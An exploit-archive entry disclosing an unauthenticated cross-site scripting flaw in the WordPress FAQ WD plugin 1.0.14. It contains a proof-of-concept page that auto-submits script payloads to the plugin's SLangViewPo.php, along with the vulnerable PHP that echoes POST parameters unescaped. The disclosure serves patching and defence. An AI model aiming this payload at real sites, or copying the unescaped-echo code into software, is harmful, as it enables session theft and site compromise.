Wordpress FAQ WD plugin 1.0.14 Unauthenticated XSS Vulnerability

2016-04-17T00:00:00
ID 1337DAY-ID-25227
Type zdt
Reporter cor3sm4sh3r
Modified 2016-04-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            I would like to report a Unauthenticated XSS vulnerability in FAQ WD  plugin version 1.0.14 .

The Plugin can be found at https://wordpress.org/plugins/faq-wd/

This Bug can be triggered by unauthenticated / Authenticated user. If a user is sent a URL by social engineering and the user clicks the link the bug can be triggred.

The URL should be something like this

http://attackerssite.com/XSS_POC.html



The code for XSS_POC.html is as follows:


<html>
  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="http://targetsite/wpinstallation/wp-content/plugins/faq-wd/lang/views/SLangViewPo.php" method="POST" >
      
	  <input type="hidden" name="lang_err_mess" value="<script>alert(1);</script>" />
<input type="hidden" name="lang_success_synchron" value="<script>alert(2);</script>" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


Techinical Details:

The vulnerable page is

wp-content/plugins/faq-wd/lang/views/SLangViewPo.php

This page can be directly accessed by anyone.

The Code responsible for the vulnerability :
<?php if (isset($_POST['lang_err_mess'])): ?>
    <div class="error" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_err_mess']; ?></p></div>
<?php elseif (isset($_POST['lang_success'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php echo 'File was successfully updated.'; ?></p></div>
<?php endif; ?>
<?php if (isset($_POST['lang_success_synchron'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_success_synchron']; ?></p></div>
<?php endif; ?>


Here we can see that there are two post request which are displayed in unsafe manner while rendering the page.

The vulnerable POST parameters are:

    $_POST['lang_err_mess']
    $_POST['lang_success_synchron']

#  0day.today [2016-04-20]  #